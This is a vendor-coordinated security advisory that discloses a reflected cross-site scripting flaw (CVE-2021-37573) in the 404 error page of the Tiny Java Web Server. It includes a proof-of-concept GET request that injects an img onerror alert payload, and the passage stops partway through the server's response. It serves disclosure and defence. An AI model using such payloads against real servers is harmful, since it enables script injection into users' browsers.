-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-042 Product: Tiny Java Web Server and Servlet Container (TJWS) Manufacturer: D. Rogatkin Affected Versions: <= 1.115 Tested Versions: 1.107, 1.114 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2021-07-21 Solution Date: 2021-07-23 Public Disclosure: 2021-08-03 CVE Reference: CVE-2021-37573 Author of Advisory: Maurizio Ruchay, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Tiny Java Web Server and Servlet Container (TJWS) is a lightweight web server written in Java. The manufacturer describes the product as follows (see [1]): "The Miniature Java Web Server is built as a servlet container with HTTPD servlet providing standard Web server functionality." Due to improper input validation, the application is vulnerable to a reflected cross-site scripting attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: It is possible to inject malicious JavaScript code into the server's error page "404 Page Not Found". The given input is not properly validated and therefore reflected back and executed in a victim's browser. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following GET request shows how JavaScript code can be placed on the page: === HTTP request: GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1 [...] Connection: close HTTP response: HTTP/1.1 404 test not found server: D. Rogatkin's TJWS (+Android, JSR340, JSR356) https://github.com/drogatkin/TJWS2.git/Version 1.114 [...] content-length: 338 connection: close